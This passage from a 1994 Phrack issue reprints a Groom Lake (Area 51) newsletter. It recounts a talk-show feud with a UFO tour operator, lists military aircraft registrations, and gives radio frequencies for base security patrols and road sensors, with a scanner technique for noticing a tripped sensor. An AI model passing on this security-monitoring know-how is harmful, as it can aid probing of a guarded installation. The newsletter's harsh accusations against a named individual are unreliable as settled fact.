  15932. awoke  enough to ask the perennial wife question.  "What did  you 
  15933. do  all weekend?"  I, in turn, gave her the usual  husbandly  re
  15934. sponse.
  15935.  
  15936. "Oh, nothing.  Good night, Gracie."
  15937.  
  15938.             * * * * * 
  15939.  
  15940. (C) 1994 Winn Schwartau
  15941. Winn  Schwartau is an information security  consultant,  lecturer 
  15942. and, obviously, a writer.  Please go buy his new book:  "Informa
  15943. tion Warfare: Chaos on the Electronic Superhighway." Available at 
  15944. book   stores  everywhere.   Winn  can  be  reached  at:   Voice: 
  15945. 813.393.6600 or E-mail: P00506@Psilink.com
  15946.                               ==Phrack Magazine==
  15947.  
  15948.                  Volume Five, Issue Forty-Six, File 21 of 28
  15949.  
  15950. ****************************************************************************
  15951.  
  15952. [Several of us had plans to tempt fate and join the other pop-culture
  15953.  lemmings running off to Area 51 during Defcon.  The not-so-secret
  15954.  base has seen more press this year than Madonna.  Armed with
  15955.  our ICOM 2SRAs and a copy of "The Area 51 Viewer's Guide"
  15956.  we planned to put our lives on the line purely for the sake of
  15957.  being able to say "We were there!"
  15958.  
  15959.  The night before we were planning on going, FOX-TV broadcast
  15960.  an episode of "Encounters" that focused heavily on Area 51.
  15961.  The thought of tromping off on our little recon adventure
  15962.  accompanied by winnebago-loads of families taking the kids
  15963.  to see "that dang UFO place from the TV," just sorta ruined
  15964.  the mood.
  15965.  
  15966.  Hopefully, this won't happen to you.  And if you do go,
  15967.  you really should consider getting the "viewer's guide"
  15968.  from Glenn Campbell (psychospy@aol.com).  Email him for
  15969.  a catalog of Area 51 stuff.
  15970.  
  15971.  Glenn also publishes an electronic mag documenting recent activities
  15972.  surrounding Area 51, and related activities.  With his permission,
  15973.  Phrack is extremely please to bring you the latest issue of
  15974.  "The Groom Lake Desert Rat."
  15975.  
  15976. -----------------------------------------------------------------------------
  15977.  
  15978. THE GROOM LAKE DESERT RAT.   An On-Line Newsletter.
  15979. Issue #15.  Sept. 2, 1994.
  15980.  -----> "The Naked Truth from Open Sources." <-----
  15981. AREA 51/NELLIS RANGE/TTR/NTS/S-4?/WEIRD STUFF/DESERT LORE
  15982. Written, published, copyrighted and totally disavowed by 
  15983. psychospy@aol.com. See bottom for subscription/copyright info.
  15984.  
  15985. In this issue...
  15986.      SUBTLETIES OF THE TELEVISION TALK SHOW, PART I
  15987.      NEW AIR FORCE STATEMENT ON GROOM
  15988.      EG&G TO ABANDON TEST SITE
  15989.      JANET "N" NUMBERS
  15990.      JANET HANDOFF FREQUENCIES
  15991.      GROOMSTOCK '94
  15992.      SOUND FAMILIAR?
  15993.      CAMPBELL ARRAIGNED
  15994.      LARRY KING NOT CLONED?
  15995.      MYSTERIOUS SIGN DISAPPEARANCE
  15996.      INTEL BITTIES
  15997.  
  15998. [Note: This file ends with "###".]
  15999.  
  16000.  ----- MEDIA COMMUNICATIONS 103A -----
  16001.  
  16002. SUBTLETIES OF THE TELEVISION TALK SHOW, PART I
  16003.  
  16004. In DR #10, we reviewed the major news media--print, radio and 
  16005. television--and showed how each could twist reality in their own 
  16006. special way.  Strictly for the sake of science, Psychospy allowed 
  16007. himself to be turned into a minor media celebrity so we could 
  16008. report to our readers the sometimes dubious processes behind the 
  16009. scenes.  There was a limit, however, to how low we would sink in 
  16010. the pursuit of knowledge.  We would not take off our clothes for 
  16011. the camera, and we would not place ourselves in any situation 
  16012. where our credibility, reputation or dignity could be seriously 
  16013. trashed. 
  16014.  
  16015. Now we can report that this barrier has been broken.  In the next 
  16016. two issues of the Rat we will recount our first-hand experiences 
  16017. with the lowest form of mass media, the television talk show.
  16018.  
  16019.  ..... THE MEDIUM OF TALK .....
  16020.  
  16021. Talk shows come in three basic formats.  The rarest but most 
  16022. respectable is the SERIOUS ISSUES talk show exemplified by "Meet 
  16023. the Press," "Nightline" and the roundtable discussions on PBS--
  16024. maybe even "Larry King Live."  They are dignified and serious, 
  16025. explore meaningful political and societal issues, and hardly 
  16026. anyone watches them.
  16027.  
  16028. The next rung down the ladder--vapid but benign--is the CELEBRITY 
  16029. CHAT talk show, like the "The Tonight Show," "Late Show with David 
  16030. Letterman" and "Arsenio Hall."  Movie stars and Big Money authors 
  16031. pump their latest work in a non-confrontational environment 
  16032. designed only to promote laughs.
  16033.  
  16034. The last and lowest form of the genre is the HUMAN CONFLICT talk 
  16035. show.  These syndicated programs always bear the name of the host, 
  16036. like  "Oprah," "Geraldo," "Vicky" or "Leeza."  He or she is a 
  16037. charismatic and camera-loving character, no doubt ruthless in real 
  16038. life, but blessed with the ability to convey warmth and sincerity 
  16039. on TV.  The fodder for these shows is a steady diet of human 
  16040. suffering, crises, angst and tragedy.  Former spouses and 
  16041. estranged friends face off against each other; grown men and women 
  16042. reveal to the parents their until-now-hidden perversities, and 
  16043. human oddities of all shapes and sizes present themselves for 
  16044. humiliation before a nationwide audience.  The ultimate goal of 
  16045. these shows is the public expression of private feelings.  They 
  16046. seek tears, anger, jealousy and graphic self-immolation recorded 
  16047. by the camera on a tight close-up.  With a dozen such shows now in 
  16048. syndication, the competition is intense to seek out new forms of 
  16049. conflict and expose the latest narcissistic trends.
  16050.  
  16051. Talk shows are produced "live on tape" with minimal editing, and 
  16052. this presents special problems for a guest.  In other forms of 
  16053. television, sound bites rule the show.  It may seem artificial, 
  16054. but tight editing at least assures that each party has their say 
  16055. and only their finest bon mot will be used.  The courteous speaker 
  16056. with a few good ideas can confidently compete with any 
  16057. extravagant, microphone-hogging blowhard, because most of what the 
  16058. blowhard says will be cut.  In the almost-live talk show, the more 
  16059. reasonable speaker has to compete with the blowhard head on.  
  16060. There is no time for an orderly presentation of evidence; he who 
  16061. makes the most outrageous, confident and colorful claims, 
  16062. groundless or not, gains the camera's eye and controls the game.
  16063.  
  16064. If you have any shred of personal dignity and are asked to be a 
  16065. guest on a Human Conflict show, the best response is obvious:  
  16066. "Just Say No."  Unless you are a masochist or a natural born 
  16067. actor, there is no way you can win in this format.  We know it 
  16068. now; we knew it then, but sometimes, like Oedipus, you just can't 
  16069. stop the inevitable march of Fate....
  16070.  
  16071.  ..... ONWARD TO HUMILIATION .....
  16072.  
  16073. The path to our own downfall was indirect.  For several months, a 
  16074. number of journalists have been making the pilgrimage to Freedom 
  16075. Ridge, and we generally escort them as a sort of local public 
  16076. relations representative.  We do not charge for this service, and 
  16077. we do not discriminate between journalists.  If TASS or Penthouse 
  16078. or the Podunk Review came to call, we would treat them no 
  16079. differently than the New York Times.
  16080.  
  16081. In May, we got a call from a producer from the Montel Williams 
  16082. Show, one of the Human Conflict shows that we had never seen.  It 
  16083. seems that "Montel," as he is known to the world, had promised on 
  16084. an earlier talk show that he would visit the border of Area 51.  
  16085. We told the producer that we would be willing to escort Montel and 
  16086. his crew to Freedom Ridge to tape a segment, but we declined an 
  16087. offer to come to New York to appear on the studio show.  Montel's 
  16088. visit was originally scheduled for May 5 but was canceled at the 
  16089. last minute, and we breathed a sign of relief.
  16090.  
  16091. In August, the project was reactivated, we suspect as the result 
  16092. of the June 22 article in the New York Times.  Montel's visit was 
  16093. scheduled for Aug. 16, and we were again asked if we would go to 
  16094. New York to appear on the later show.  Again, we declined.
  16095.  
  16096. When Montel came to Rachel, he brought a Humvee, his producers and 
  16097. a film crew.  We went through the usual script for the camera:  
  16098. Montel drives up to our Research Center, and we meet him in the 
  16099. driveway.  Inside, we show him where we are going on the map, then 
  16100. we get in the car and drive the rugged road to Freedom Ridge.  We 
  16101. had done it before with countless crews, but never so quickly and 
  16102. in so few "takes."  When Montel arrived, there was no question 
  16103. that he was in charge.  He asked no significant questions, and 
  16104. showed no particular interest in the secret base itself.  We 
  16105. sensed that he came only because he said he would and that his 
  16106. primary aim was to film a sound bite on the ridge that said, "You 
  16107. see, I did what I promised."
  16108.  
  16109. As we rode down from Freedom Ridge in the Humvee with Montel and 
  16110. the producer, we were again asked if we would come to New York to 
  16111. appear on the talk show the following week, Aug. 23.  We hesitated 
  16112. and were about to turn down the offer cold, when the producer 
  16113. uttered the only horrible words that could force us to comply.
  16114.  
  16115. Sean David Morton.
  16116.  
  16117.  ..... THE EMBODIMENT OF EVIL .....
  16118.  
  16119. We first learned of Sean Morton over two years ago, before we came 
  16120. to Rachel.  We had heard his enthusiastic endorsement of the Black 
  16121. Mailbox on a UFO video:
  16122.  
  16123.    "Probably the most amazing thing about Area 51 is the fact that 
  16124. this is literally the only place in the world where you can go out 
  16125. and actually see flying saucers on a timetable basis.  You can 
  16126. literally go out there on a Wednesday night between about seven 
  16127. and one a.m. and you'll see these things flying up and down the 
  16128. valley.  It's absolutely amazing.  On even a bad night you'll have 
  16129. ten, eleven, twelve sightings.  On a good night--and I've been out 
  16130. there with friends of mine camping--on a good night the sky will 
  16131. just rip open with these things.  You'll see anywhere between 
  16132. twenty to forty objects in a night testing over the base for 
  16133. anywhere from fifteen and forty minutes at a time."
  16134.  
  16135. We've lived near the border for over a year and a half now, are 
  16136. genuinely interested in UFOs and have spent countless days and 
  16137. nights in the desert; yet we haven't seen even ONE flying saucer, 
  16138. let alone scores.  The logical explanation is that we arrived too 
  16139. late, after the saucers had been packed up and moved elsewhere.  
  16140. The trouble with this theory is that during the early part of our 
  16141. tenure, Sean Morton continued to bring tours to the area--at $99 a 
  16142. head--and reported UFOs everywhere.
  16143.  
  16144. In one celebrated incident in March 1993, Psychospy spent the 
  16145. night on White Sides, overlooking Groom Lake, with some aviation 
  16146. watchers and a writer from Popular Science.  We were looking for 
  16147. the alleged Aurora spyplane--almost as ephemeral as flying 
  16148. saucers--but we saw nothing more than a few satellites, some 
  16149. distant aircraft strobes and an occasional meteor.  The following 
  16150. was reported in the March 1994 Popular Science....
  16151.  
  16152.    "Last March, three chilly airplane watchers with binoculars 
  16153. atop White Sides Mountain at this magic hour [4:45am] were 
  16154. tracking a 737 airliner approaching Groom Lake, as a fourth member 
  16155. of their group thawed out in his truck below.  Parked on a knoll, 
  16156. he was next to a vanload of UFO seekers.  They were lead by tour 
  16157. operator Sean Morton, whose leaflet described him as 'the world's 
  16158. foremost UFO researcher.'
  16159.  
  16160.    "Morton donned a horned Viking helmet and from time to time 
  16161. pointed to the sky, exclaiming: 'Look at that one!'  The airplane 
  16162. watcher trained his binoculars in the same direction but saw 
  16163. nothing out of the ordinary.  Later, Morton's group became excited 
  16164. by what they perceived as an entire formation of UFOs; the 
  16165. airplane watcher's lenses revealed only stars.  Finally, as the 
  16166. morning's first 737 made its gentle approach toward Groom Lake at 
  16167. 4:45, the UFO enthusiasts rejoiced at Old Faithful's appearance.  
  16168. Everyone had seen exactly what they hoped for."
  16169.  
  16170. In the beginning, when we were new to the area, we were generous 
  16171. to Sean and called him "fantasy prone."  As we got to know him 
  16172. better and gained confidence in our own knowledge base, we came to 
  16173. mince no words.  Sean is a deliberate con man.  He recognizes as 
  16174. well as us the landing lights of a 737, but he knows that others 
  16175. can be fooled and taken for a $99 ride to see them.  If anyone is 
  16176. spreading disinformation about Area 51, filling the air with noise 
  16177. to make the truth harder to grasp, it isn't sinister government 
  16178. agents; it's Sean David Morton pursuing only his own greed and 
  16179. self-aggrandizement.
  16180.  
  16181. We have worked hard over the past 18 months to undo the damage 
  16182. Sean has done and displace him from the Area 51 scene.  
  16183. Discrediting Sean isn't complicated:  We simply quote his own 
  16184. words whenever we can.  Sean is a broadly diversified charlatan, a 
  16185. self-proclaimed expert in faith healing, earthquake prediction, 
  16186. psychic prophesy and virtually every other New Age fad.  We have 
  16187. no problem at all with him plying his trade within the confines of 
  16188. the state of California where he justly belongs, but when he 
  16189. proclaims himself the foremost authority on Area 51, we get 
  16190. territorial.  We hope that our "Area 51 Viewers Guide" has reduced 
  16191. the gullibility of newcomers and made the environment less 
  16192. attractive for leeches like him.  In fact, we haven't had a 
  16193. confirmed Morton sighting near the border in over a year.  We 
  16194. heard from sources in California that he no longer gave tours to 
  16195. Area 51 because the saucers had been moved elsewhere--which was 
  16196. fine by us.
  16197.  
  16198. The saucers must have returned, however.  As the recent Groom Lake 
  16199. publicity reached its peak, "The World's Foremost UFO Researcher" 
  16200. could not help but resurface to suck energy from it.  In recent 
  16201. months, reports began to reach us that he had appeared as an Area 
  16202. 51 expert at UFO conferences, on radio talk shows and on the 
  16203. Montel Williams Show.  
  16204.  
  16205. In the latter appearance, which was first broadcast in December 
  16206. 1993, Sean showed video footage of nighttime "UFOs" that he said 
  16207. he photographed "at great risk to my own life."  As we viewed them 
  16208. later, one clip showed an isolated circle of light jumping around 
  16209. within the frame.  It could have been any stationary out-of-focus 
  16210. light shot through a hand-held video camera.  Notches seen on the 
  16211. top and bottom of the "disk" correspond to protrusions inside the 
  16212. lens assembly.  In the other clip, only slightly out of focus, we 
  16213. saw the lights of a 737 landing on the Groom Lake airstrip.  To 
  16214. Sean, it was "an object actually coming in from space."  The time 
  16215. stamp in the corner said "4:49 am."
  16216.  
  16217. It was on this show that Montel promised to visit Area 51 escorted 
  16218. by Sean; yet when Montel finally made the trip eight months later, 
  16219. Sean was not invited.  The producer told us that word had reached 
  16220. him from many sources that Sean was considered a fraud, that in 
  16221. addition to UFOs he also did psychic prophesies and that his 
  16222. claimed credentials were highly dubious.  He and Montel felt that 
  16223. Sean had taken advantage of them and that by having him on the 
  16224. show they had inadvertently legitimized him.
  16225.  
  16226. But none of that prevented them from inviting him back as a guest 
  16227. the second studio show.
  16228.  
  16229. As we rode down in the Humvee from Freedom Ridge with Montel and 
  16230. the producer, the reality to us became crystal clear:  If we did 
  16231. not appear on the Montel Williams Show, then Sean would have the 
  16232. stage all to himself and could continue to spread any sort of 
  16233. nonsense about Area 51.  We felt that we had no choice.  Either we 
  16234. did battle with this guy now, before he grew bigger, or we would 
  16235. be cleaning up his mess for many months to come.
  16236.  
  16237.  ..... OUR RAPID EDUCATION .....
  16238.  
  16239. We had less than a week to prepare for the big show--nowhere near 
  16240. enough time to do all the research we needed.  The first item of 
  16241. business was to actually watch the Montel Williams Show and 
  16242. familiarize ourselves with the format.  We cranked up our 
  16243. satellite dish and surfed through the channels.  On "Donahue":  
  16244. "Six Year Olds Who Sexually Harass Other Six Year Olds."  On 
  16245. "Rolanda, a related topic:  "Will Your Child Grow Up To Be A 
  16246. Serial Killer?"  On "The Vicky Show," we heard that Sean Morton 
  16247. had just appeared as an expert on the prophesies of Nostradamus, 
  16248. but we were unable to catch that one.
  16249.  
  16250. The first Montel Williams Show we saw was, "Mistresses Who Want To 
  16251. End The Affair."  On the stage, three women disguised by dark 
  16252. sunglasses explained why they had been attracted to married men.  
  16253. We could only tolerate about ten seconds at a time of this show, 
  16254. but when we tuned back, we found that the women had shed their 
  16255. sunglasses and revealed their true identities.  Presumably, they 
  16256. had also revealed, or at least seriously compromised, the 
  16257. identities of the men they had been having the affairs with.  When 
  16258. we tuned in again later, one of the three was having an angry 
  16259. argument with a fourth female guest.  We guessed that this was the 
  16260. wife of one of the married men.
  16261.  
  16262. A friend sent us a tape of Montel's original UFO show in which 
  16263. Sean appeared as a "UFO Investigator" and Montel promised to 
  16264. visit.  The show included an abductee, a witness to the "Kecksburg 
  16265. Incident," a former actress, WFUFOR Sean David Morton, a requisite 
  16266. skeptic, a pro-UFO filmmaker and--as if you hadn't guessed--that 
  16267. talk show regular Travis Walton.  The show was conducted in the 
  16268. "expanding chairs" format.  It started out with two guests alone 
  16269. on the stage, then more guests and chairs were added during each 
  16270. commercial break until there were seven chairs and seven 
  16271. squabbling speakers vying for attention on the platform.  In this 
  16272. format, attention is diluted with each new chair, so the people 
  16273. who appear last, typically the skeptics, usually get only a few 
  16274. seconds of airtime.  During the free-for-all of a seven-person 
  16275. debate, the camera always focuses on the most aggressive and 
  16276. charismatic guest--i.e. Sean David Morton.
  16277.  
  16278. The last chair to be filled was occupied by filmmaker Russ Estes, 
  16279. who the on-screen caption said, "Does Not Believe In UFOs."  This 
  16280. is false.  He is a disciplined UFO investigator who has devoted 
  16281. his career to making films on the subject, as well as exposing 
  16282. obvious frauds.  What is true is that he "Does Not Believe In Sean 
  16283. Morton."  In his few seconds of air time, he raised doubts about 
  16284. one of Morton's many fake credentials, his claimed "Doctor of 
  16285. Divinity" degree.
  16286.  
  16287. RUSS ESTES:  "Montel, my biggest problem, and this is what I've 
  16288. run into over and over again, is the quality of the individual who 
  16289. is bringing me the message.  You know, the-boy-that-cried-wolf 
  16290. syndrome is phenomenal in this field.  You get people out there 
  16291. who are saying, I'm this, I'm that, and I hate to do this to you, 
  16292. Sean, but here's a guy right here who claims to be the Doctor, 
  16293. Reverend Sean David Morton.  In his own biography, he claims to 
  16294. have gotten his Doctor of Divinity at--excuse me, it will take me 
  16295. one second...."
  16296.  
  16297. SEAN MORTON:  "Berachah University."
  16298.  
  16299. RUSS ESTES:  "Berachah University, Houston, Texas--the Berachah 
  16300. Church.  I called them.  They don't have any type of degrees that 
  16301. they give.  They have Bible study at the best.  He claims to have 
  16302. attended University of Southern California...."
  16303.  
  16304. MONTEL WILLIAMS:  "So the point that you are making, Russ, is that 
  16305. there's a problem with the messenger, so therefore the message is 
  16306. not real."
  16307.  
  16308. RUSS ESTES:  "How can you believe the message if the people lie to 
  16309. you from the start."
  16310.  
  16311. SEAN MORTON:  "The thing I'd like to point out about Mr. Estes 
  16312. here is that if you don't like the message, you can shoot the 
  16313. messenger, and it's obvious to me that in the UFO field, we do 
  16314. this for free, we do this because we want to know the truth, 
  16315. because we have seen something...."
  16316.  
  16317. RUSS ESTES:  "But does that mean you bogey up your credentials?"
  16318.  
  16319. SEAN MORTON (angry):  "That is not true.  You are flat-out lying 
  16320. to these people.  I went to USC for four years."
  16321.  
  16322. Just then, the debate was cut off by a sloppy edit, and Sean's USC 
  16323. diploma appeared on the screen.  
  16324.  
  16325. After watching the tape, we contacted Russ Estes.  He said that 
  16326. the debate between he and Sean went on much longer than was shown 
  16327. on the screen.  "Live on tape" does not mean totally unedited.  
  16328. This show went on for over two hours to obtain a one hour's worth 
  16329. of material.  Sometimes, whole shows are thrown out when they 
  16330. don't work.  Unfortunately, Estes made a misstep on the USC 
  16331. degree.  As it turns out, this is just about the only authentic 
  16332. credential he has: a B.A. in Drama and Political Science.  We 
  16333. certainly believe the Drama part:  It's the last degree he ever 
  16334. needed.
  16335.  
  16336. The Doctor of Divinity degree is still phony, but in the talk show 
  16337. world, evidence counts for nothing; only emotions and presentation 
  16338. matter.  Sean walked away from the show as a brave and 
  16339. knowledgeable crusader, legitimized by a promise from Montel to 
  16340. take his tour, and with the implied invitation to reappear on the 
  16341. show.  Estes walked away alone, wasn't invited to return, and has 
  16342. since had to live down the "Does Not Believe in UFOs" moniker.  
  16343. Sean even had the delightful gall to send Estes a letter, through 
  16344. the producers...
  16345.  
  16346.  ---
  16347.  
  16348. Mr. Russ Estes
  16349. c/o Alex Williams [sic]
  16350. The Montel Williams Show
  16351. 1500 Broadway Suite 700
  16352. New York, New York, 10036
  16353.  
  16354. Dear Russ:
  16355.  
  16356. I am going to assume that you are not a bold faced liar who is out 
  16357. for some kind of warped revenge, or a person who is just trying to 
  16358. make a buck off baseless slander.
  16359.  
  16360. Let's try to solve this like gentlemen - enclosed is a copy of my 
  16361. U.S.C. diploma.  I have also called the school and my records are 
  16362. intact.  The rest of your "research" on me is equally faulty.
  16363.  
  16364. I hope this solves out problem.  If not, I have consulted my 
  16365. attorney and any further slander directed toward me through your 
  16366. video series or elsewhere, will result in action taken against 
  16367. you.
  16368.  
  16369. Yours Truly,
  16370. [BIG signature]
  16371. Sean Morton
  16372.  
  16373.  ---
  16374.  
  16375. Things were beginning to look grim for Psychospy.  With the time 
  16376. of the taping drawing near, we hadn't even begun to scratch the 
  16377. surface of Sean David Morton and his path of destruction.  Talking 
  16378. to our contacts, we saw that Sean had accumulated a vast audience 
  16379. of intimate enemies, more than we could possibly contact.  If Sean 
  16380. sounds knowledgeable and occasionally has some meaningful 
  16381. information, it is because he has ripped it off from others.  We 
  16382. were amused to find that there was even an reputable astrologer 
  16383. who hated Sean, who felt that Sean had stolen his predictions and 
  16384. passed them off as his own.
  16385.  
  16386. It seemed a futile exercise anyway.  We knew all the evidence in 
  16387. the world wasn't going to matter when we actually faced off 
  16388. against Sean on camera.   We were leaving behind our own 
  16389. comfortable medium of logic and data and stepping into his home 
  16390. turf--the talk show--where presentation counts more than content.  
  16391. We were obligated by our own ethics to speak only the simplest 
  16392. truths and the cautious assertions supported by data.  Sean David 
  16393. Morton, bold faced liar that he is, faced no such constraints.  He 
  16394. could spout any lie he wanted to sound important and get himself 
  16395. off the hook, and the only thing that mattered here was that he 
  16396. said it with apparent sincerity and that it held up for 
  16397. television's thirty second attention span.  We knew that if we 
  16398. started to make an accusation about him, he would instantly sense 
  16399. the winds and make the same one against us with greater force.  
  16400. The ensuing argument would make he and us appear to be equals.
  16401.  
  16402. Sean knew all the buzzwords and cliches of the UFO movement and 
  16403. could spout the conventional wisdom much faster than we could.  He 
  16404. knew how to sound sincere and reasonable and adapt instantly to 
  16405. the sentiments of any social circumstance.  He was well-practiced 
  16406. at responding to inquisitions and had emerged from many without a 
  16407. scratch.  Opposing him, all we had was a body of mundane knowledge 
  16408. about a very limited area of the desert.  Sean was smooth and 
  16409. well-honed in his talk show delivery, and we were stumbling in for 
  16410. the first time to a medium where we really didn't want to be.
  16411.  
  16412. It was with these reservations and a sense of dark foreboding that 
  16413. we packed our bags and headed for New York City.  There, in Times 
  16414. Square, we expected a titanic battle between Good and Evil, and 
  16415. things didn't look good for Good.
  16416.  
  16417. [To be continued in Desert Rat #16....]
  16418.  
  16419.  ----- NEW AIR FORCE STATEMENT ON GROOM -----
  16420.  
  16421. The following statement was recently released to inquiring 
  16422. journalists by the Nellis AFB public affairs office.  (We 
  16423. requested our own copy from Major George Sillia on Aug. 26.)  It 
  16424. represents a significant shift from the previous "We know nothing 
  16425. about Groom Lake" response.
  16426.  
  16427.    "There are a variety of facilities throughout the Nellis Range 
  16428. Complex.  We do have facilities within the complex near the dry 
  16429. lake bed of Groom Lake.  The facilities of the Nellis Range 
  16430. Complex are used for testing and training technologies, 
  16431. operations, and systems critical to the effectiveness of U.S. 
  16432. military forces.  Specific activities conducted at Nellis cannot 
  16433. be discussed any further than that."
  16434.  
  16435. That's a step in the right direction.  What the base needs now is 
  16436. a name and a history.  For example, tell us about the U-2 and A-12 
  16437. programs at Groom in the 1950s and 1960s.  That's not very secret 
  16438. or critical to our current defense, so what's the point in 
  16439. pretending it is?  Will the Air Force take control of the 
  16440. situation and provide this information itself, or will the void be 
  16441. filled by a dozen aggressive entrepreneurs?
  16442.  
  16443. We'd bet our money on the entrepreneurs.
  16444.  
  16445.  ----- EG&G TO ABANDON TEST SITE ----
  16446.  
  16447. According to an 8/26 article in the Las Vegas Review-Journal, EG&G 
  16448. and its REECo subsidiary will not seek renewal of their Nevada 
  16449. Test Site contract when it expires in 1995.  These are two of the 
  16450. three companies that have managed the nuclear testing ground since 
  16451. its inception.  It is unclear whether this action will have any 
  16452. affect on operations at the adjoining Groom Lake base, where EG&G 
  16453. and REECo are also assumed to be major contractors.  
  16454.  
  16455. Recent rumors say that EG&G no longer operates the "Janet" 737 
  16456. jets that shuttle workers to Groom and Tonopah.  That operation 
  16457. has supposedly been taken over by the Air Force, using the same 
  16458. aircraft and possibly the same staff.
  16459.  
  16460.  ----- JANET "N" NUMBERS -----
  16461.  
  16462. For aircraft watchers, here are the registration and serial 
  16463. numbers of Janet 737s and Gulfstream commuter planes spotted at 
  16464. the Janet terminal at McCarran airport.  Based on observations in 
  16465. 5/94 and the 4/30/94 FAA registry.  One or more of the Janet 
  16466. aircraft are probably missing from this list.  (We ask our readers 
  16467. to find them.)
  16468.  
  16469. Boeing 737...
  16470. Reg. #/Serial #/Owner
  16471. N4508W  19605  Great Western Capital Corp, Beverly Hills
  16472. N4510W  19607  Great Western Capital Corp, Beverly Hills
  16473. N4515W  19612  Great Western Capital Corp, Beverly Hills
  16474. N4529W  20785  First Security Bank of Utah, Salt Lake City
  16475. N5175U  20689  Dept. of the Air Force, Clearfield UT
  16476. N5176Y  20692  Dept. of the Air Force, Clearfield UT
  16477. N5177C  20693  Dept. of the Air Force, Clearfield UT
  16478.  
  16479. Gulfstream C-12...
  16480. N20RA   UB-42  Dept. of the Air Force, Clearfield UT
  16481. N654BA  BL-54  Dept. of the Air Force, Clearfield UT
  16482. N661BA  BL-61  Dept. of the Air Force, Clearfield UT
  16483. N662BA  BL-62  Dept. of the Air Force, Clearfield UT
  16484.  
  16485.  ----- JANET HANDOFF FREQUENCIES ----
  16486.  
  16487. A DESERT RAT EXCLUSIVE!  Published here for the first time are the 
  16488. air traffic control frequencies for the "Janet" 737 crew flights 
  16489. from Las Vegas McCarran Airport to Groom.  The McCarran freqs are 
  16490. public, but the Groom ones have not been revealed until now.  Air 
  16491. traffic control broadcasts are "in the clear" and any scanner 
  16492. radio should be able to pick them up.  Each of these freqs has 
  16493. been personally confirmed by Psychospy or a close associate.
  16494.  
  16495. 121.9   McCarran Ground Control
  16496. 119.9   McCarran Tower
  16497. 133.95  Departure Control
  16498. 119.35  Nellis Control
  16499. 120.35  Groom Approach
  16500. 127.65  Groom Tower
  16501. 118.45  Groom Ground
  16502.  
  16503. Here are some other Groom freqs (some of which were previously 
  16504. reported in DR #8).  The security frequencies are usually 
  16505. scrambled, but not always.
  16506.  
  16507. 418.05  Cammo Dudes (primary)
  16508. 408.4   Cammo Dudes (repeat of 418.05)
  16509. 142.2   Cammo Dudes
  16510. 170.5   Cammo Dudes (Channel 3)
  16511. 138.3   "Adjustment Net" (seems related to security)
  16512. 261.1   Dreamland Control (published)
  16513. 255.5   Groom Tower (repeat of 127.65)
  16514. 154.86  Lincoln County Sheriff
  16515. 496.25  Road sensors on public land
  16516. 410.8   Pager (apparently from Groom but unconfirmed)
  16517.  
  16518. The most accurate way to detect a road sensor (AFTER you have 
  16519. tripped it), is to program 496.25 into several channels of your 
  16520. scanner, then scan those channels exclusively as you are driving.  
  16521. When the scanner stops on one channel, you have just passed a 
  16522. sensor.
  16523.  
  16524.  ----- GROOMSTOCK '94 -----
  16525.  
  16526. The "Freedom Ridge Free Speech Encampment" went pretty much as 
  16527. planned, with at least sixty people in attendance but not all of 
  16528. them staying for the night.  There were no surprises and, sadly, 
  16529. no confrontations with the authorities when we whipped out our 
  16530. cameras and pseudo-cameras to point at the secret base.  The Cammo 
  16531. Dudes were visible but kept their distance, and the only authority 
  16532. figure to show up on the ridge was a BLM Ranger in a Smoky-the-
  16533. Bear hat.  He was concerned only that we clean up our trash, and 
  16534. he warned us, by his very presence, that "Only You Can Prevent 
  16535. Forest Fires."
  16536.  
  16537. The event was recorded in an 8/29 article in the Las Vegas Review-
  16538. Journal, which dubbed it "Groomstock."  [The article may be 
  16539. available at the FTP site.]  We were disturbed to read in the 
  16540. paper that the attendees included some "marijuana-smoking 
  16541. slackers."  We called around and found out it was true and that it 
  16542. happened after Psychospy went to bed.  Had we known, we would have 
  16543. quashed it immediately.  This sort of thing discredits our ability 
  16544. to police ourselves and hurts the reputation of the land grab 
  16545. opponents.
  16546.  
  16547. The hot gossip around the campfire was about the Review-Journal 
  16548. reporter and the loony in the tie-dyed shirt.  The loony had spent 
  16549. about an hour moving rocks and dirt around to make himself a 
  16550. comfortable bed, then he blew a conk-shell horn and banged cymbals 
  16551. together to bless it.  When the reporter arrived, he volunteered 
  16552. to make a bed for her, too, not far from his own, and he proceeded 
  16553. with the project without any encouragement.  It is unknown why he 
  16554. singled her out for this special honor, but evidently she was 
  16555. "chosen."  It should be noted, however, that while blessing the 
  16556. reporter's bed, the loony accidentally dropped one of the cymbals.  
  16557. We forget to check with the reporter in the morning to see if that 
  16558. omen affected the quality of her nighttime experience.
  16559.  
  16560.  ----- SOUND FAMILIAR? -----
  16561.  
  16562. From an AP news story printed in the 8/5 Review-Journal...
  16563.  
  16564.    "PORT-AU-PRINCE, Haiti -- Authorities deported an American TV 
  16565. crew Thursday, putting the three journalists in an open pickup 
  16566. truck, parading them through the capital and then dumping them at 
  16567. the Dominican border....
  16568.  
  16569.    "Soldiers detained the freelance journalists for PBS's 'The 
  16570. MacNeil/Lehrer Newshour' on Sunday while they were filming at 
  16571. Port-au-Prince's airport.  Three of their videotapes were 
  16572. seized....
  16573.  
  16574.    "The military-backed government has urged journalists not to 
  16575. report 'alarmist' news and has attempted to restrict news 
  16576. coverage....
  16577.  
  16578.    "'I think it's deplorable, and it's obviously an attempt to 
  16579. embarrass them,' [U.S.] Embassy spokesman Stanley Schrager told 
  16580. The Associated Press.  'This treatment was not necessary; neither 
  16581. was the deportation....  It's a transparent attempt by this 
  16582. illegal regime to interfere with the free flow of information.'"
  16583.  
  16584. In related news, the four of the five video tapes seized on July 
  16585. 19 from KNBC-TV have still not been returned.  The tapes were 
  16586. taken without a warrant after the crew filmed an interview on 
  16587. Freedom Ridge but not the Groom base itself.  Activist Glenn 
  16588. Campbell, who accompanied the crew, was arrested when he attempted 
  16589. to interfere with this seizure.
  16590.  
  16591.  ----- CAMPBELL ARRAIGNED -----
  16592.  
  16593. Activist Glenn Campbell reports that his Aug. 24 arraignment on 
  16594. obstruction charges was "amicable."  Charges were presented, but 
  16595. the District Attorney did not appear.  The complete text of the 
  16596. charges, stemming from the July 19 KNBC incident, reads as 
  16597. follows...
  16598.  
  16599.  ---
  16600.  
  16601. Case No. P55-94
  16602.  
  16603. IN THE JUSTICE COURT OF THE PAHRANAGAT VALLEY TOWNSHIP
  16604. IN AND FOR THE COUNTY OF LINCOLN, STATE OF NEVADA
  16605.  
  16606. CRIMINAL COMPLAINT
  16607.  
  16608. STATE OF NEVADA, Plaintiff,
  16609.  vs.
  16610. GLENN P. CAMPBELL, Defendant.
  16611.  
  16612. STATE OF NEVADA    ) ss.
  16613. County of Lincoln  )
  16614.  
